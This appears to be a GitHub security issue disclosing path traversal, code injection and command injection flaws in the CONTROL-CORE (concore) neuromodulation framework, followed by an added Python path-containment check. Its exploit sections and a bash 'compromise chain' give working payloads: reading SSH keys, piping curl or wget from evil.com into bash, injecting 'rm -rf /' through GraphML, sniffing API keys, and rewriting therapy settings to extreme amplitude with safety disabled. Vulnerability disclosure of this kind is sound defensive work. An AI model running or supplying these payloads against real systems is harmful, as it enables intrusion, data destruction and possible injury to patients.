Multiple RCE and Path Traversal Vulnerabilities in CONTROL-CORE Medical Framework - Patient Safety Risk #524
Open
EXECUTIVE SUMMARY
The CONTROL-CORE (concore) neuromodulation framework contains multiple critical vulnerabilities enabling remote code execution, arbitrary file access, and medical device compromise. These flaws affect all implementations and pose immediate patient safety risks.
Location: concore/concore.py:223,290,293
# VULNERABLE CODE
file_path = os.path.join(inpath+str(file_port_num), name)
file_path = os.path.join("../"+port_identifier, name)
Exploit:
concore.read(1, "../../../etc/passwd", "")
concore.write(1, "../../../tmp/backdoor.py", "import os;os.system('rm -rf /')")

Location: concore/concore.py:149,256,323
# VULNERABLE CODE
params = literal_eval(sparams)
inval = literal_eval(ins)
Exploit:
# Create malicious concore.params
echo "__import__('os').system('curl evil.com/shell|bash')" > ./in1/concore.params

Location: concore/mkconcore.py:615-680
# VULNERABLE CODE
fbuild.write("mkdir docker-"+dockername+"\n")
fbuild.write("cp ../src/"+sourcecode+" .\n")
Exploit:
<!-- Malicious GraphML -->
<node id="n1"><data key="d0">evil; rm -rf /; echo pwned:</data></node>

Location: concore/tools/pwrap.py:13,85
# VULNERABLE CODE
apikey=open(concore.inpath+'1/concore.apikey').readline()
r = requests.post('http://www.controlcore.org/ctl/'+apikey, files=f)
print(apikey) # Logged in plaintext

Location: concore/concore.py:38,75
# VULNERABLE CODE - No encryption
self.socket.bind("tcp://*:5555") # Binds to all interfaces
# All ZeroMQ traffic in plaintext

Location: concore/concore.hpp:136,355
// VULNERABLE CODE
shmId_create = shmget(key, 256, IPC_CREAT | 0666); // World-writable
std::string message(sharedData_get, strnlen(sharedData_get, 256)); // No bounds check

Complete System Compromise Chain
#!/bin/bash
# 1. Path traversal to read SSH keys
python3 -c "import concore; print(concore.read(1, '../../../root/.ssh/id_rsa', ''))"
# 2. Code injection via params file
echo "__import__('subprocess').call(['wget','http://evil.com/backdoor.py','-O','/tmp/b.py'])" > ./in1/concore.params
# 3. Command injection via GraphML
cat > malicious.graphml << EOF
<graphml><node id="n1"><data key="d0">test; curl evil.com/shell.sh|bash; echo normal</data></node></graphml>
EOF
# 4. API key theft via network interception
tcpdump -i any host controlcore.org -A | grep -E "(apikey|authorization)"
# 5. Medical device parameter manipulation
python3 -c "import concore; concore.write(1, '../../../etc/medical/therapy.conf', 'amplitude=999999\nsafety_disabled=true')"

REFERENCES
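
A containment check for the `os.path.join(inpath+str(file_port_num), name)` pattern quoted in the issue, as an added example that is not part of the original report or the concore code base. `resolve_port_file`, `UnsafePathError`, `demo` and the sample file names are hypothetical; the traversal name is the one the issue quotes.

```python
import os
import tempfile


class UnsafePathError(ValueError):
    """Raised when a requested name would resolve outside its port directory."""


def resolve_port_file(inpath, file_port_num, name):
    """Return the canonical path of `name` inside inpath+str(file_port_num).

    Hypothetical helper: compares canonical paths rather than trusting
    os.path.join, so '..' segments, absolute names and symlinks are caught.
    """
    base = os.path.realpath(inpath + str(file_port_num))
    if not name or "\x00" in name or os.path.isabs(name):
        raise UnsafePathError(f"rejected file name: {name!r}")
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath compares whole components, so ".../in1" never matches ".../in10".
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"{name!r} resolves outside {base}")
    return candidate


def demo():
    """Check constructed names in a throwaway directory; returns {name: accepted}."""
    names = [
        "ym",                   # ordinary data file
        "sub/../ym",            # '..' that stays inside the port directory
        "../../../etc/passwd",  # traversal name quoted in the issue
        "/etc/passwd",          # absolute name
        "../in10/ym",           # sibling port directory sharing a string prefix
        "link/secret",          # constructed symlink pointing out of the directory
    ]
    results = {}
    with tempfile.TemporaryDirectory() as root:
        inpath = os.path.join(root, "in")
        os.mkdir(inpath + "1")
        os.mkdir(inpath + "10")
        os.symlink(root, os.path.join(inpath + "1", "link"))
        for name in names:
            try:
                resolve_port_file(inpath, 1, name)
                results[name] = True
            except UnsafePathError:
                results[name] = False
    return results


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{'accept' if accepted else 'reject'}  {name}")
```

The sibling-directory and symlink cases are the ones a plain `startswith` prefix test or a `'..' in name` filter lets through.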